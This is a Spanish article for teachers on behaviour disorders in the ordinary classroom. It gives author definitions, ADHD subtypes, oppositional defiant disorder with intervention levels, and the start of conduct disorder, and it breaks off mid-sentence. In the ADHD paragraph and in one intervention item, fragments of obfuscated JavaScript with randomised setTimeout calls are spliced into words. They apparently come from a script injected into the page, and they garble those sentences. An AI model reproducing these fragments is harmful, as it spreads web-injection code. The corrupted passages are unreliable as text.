LOS TRASTORNOS DEL COMPORTAMIENTO EN EL AULA ORDINARIA: CONCEPTOS, TIPOS E INTERVENCIÓN EDUCATIVA

Autora: María Isabel Díaz de la Peña López

          A menudo nos encontramos en nuestro trabajo con alumnos que presentan un “comportamiento inadecuado” que nos llama bastante la atención y que no sabemos cómo atajarlo.

           Por este motivo, creo conveniente explicar qué son los trastornos del comportamiento, qué tipos nos podemos encontrar en nuestras aulas y cómo podemos intervenir o dar una respuesta educativa adecuada.

           En primer lugar, vamos a definir los trastornos del comportamiento desde la perspectiva de diferentes autores:

  • Kazdín (1995) considera los TGC (trastornos graves de conducta y del comportamiento) como “un patrón de comportamiento persistente a lo largo del tiempo, que afecta a los derechos de los otros y violenta las normas apropiadas de la edad.”
  • Brioso y Sarriá (2003) lo definen como “ciertas conductas que afectan a la relación del sujeto con su entorno que interfiere negativamente en su desarrollo, que se constituyen en síntomas pero que no se organizan en forma de síndrome, sino que se presentan de forma aislada o en combinaciones muy limitadas…; que no son patológicas en sí mismas sino que el carácter patológico viene dado por su exageración, déficit o persistencia.”
  • José Domínguez Alonso (2008) hace referencia a los problemas de conducta como ”el comportamiento que afecta negativamente a uno mismo y al entorno en que viven (familia, escuela y grupo de amigos…) que llevan al individuo a romper las normas de convivencia y deteriorar el desarrollo personal y social.”

           Una vez definidos los trastornos del comportamiento pasamos a explicar las diferentes clasificaciones.

-         TRASTORNO DEL DÉFICIT DE ATENCIÓN CON O SIN HIPERACTIVIDAD. Definido, según el DSM-IV (TDAH), como “el patrón persistente de desatención y/o hiperactividad, impulsividad o inhibición, que es más frecuente y grave que el observado habitualmente en sujetos de un nivel de desarrollo similar.”


 

-         TDAH/HI: TRASTORNO DEL DÉFICIT DE ATENCIÓN CON HIPERACITIVIDAD con predominio hiperactivo/impulsivo, considerandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la impulsividad como al alumno que responde de forma precipitada, presenta dificultad para guardar su turno e interrumpe a todos, y la hiperactividad cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando hablan y se mueven en exceso.


 

-         TDAH/I: TRASTORNO POR DÉFICIT DE ATENCIÓN CON HIPERACTIVIDAD con predominio del déficit de atención.


 

-         TDAH/C: TRASTORNO POR DÉFICIT DE ATENCIÓN CON HIPERACTIVIDAD tipo combinado.


 

-         TRASTORNO NEGATIVISTA DESAFIANTE (TND): es un patrón de conducta que se manifiesta en un recurrente rechazo a la autoridad, que dura al menos seis meses y suele darse antes de los 9 ó 10 años. Los que lo padecen presentan un comportamiento desafiante, desobediente y provocador. Suelen ser niños hostiles, que se resisten a obedecer, suelen romper las reglas y no siguen las normas esperadas para su edad. Los comportamientos más habituales suelen ser:

-           quejas, lamentos lloros, discusiones, gritos y palabrotas.

-           Incumplimiento de encargos y tareas.

-           Destrucción de objetos propios y ajenos.

-           Susceptibilidad e irritabilidad.

-          Enfrentamientos groseros con los adultos y peleas.

 


En este tipo de trastorno (TND) está asociado a:

-          Una baja autoestima.

-          Poca tolerancia a la frustración.

-          Mala relación con los amigos.

-          Eventualmente bajo rendimiento académico.


 

          ¿Cómo nos planteamos el intervenir con este tipo de alumno o dar una respuesta educativa adecuada?

Podemos trabajar a:

-            nivel académico y cognitivo: centrándonos en sus aptitudes, en el estilo cognitivo, teniendo en cuenta su nivel de competencia curricular, trabajar a través de “la economía de fichas”, etc.

-            nivel social: con el aprendizaje de habilidades sociales, ofreciendo un mayor grado de integración, trabajandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la autoestima, las atribuciones y expectativas del alumno.

-            nivel comportamental: estableciendo una línea base con los objetivos conductuales alcanzables.


 

-         TRASTORNO DISOCIAL (TD): Según Arias B (2000): “es un producto ya de una personalidad trastornada en que aparece la transgresión a las normas sociales, que supone un enfrentamiento directo a las instituciones sociales y con el establecimiento de lazos afectivos correctos y deriva en una reacción institucional que terminaría afianz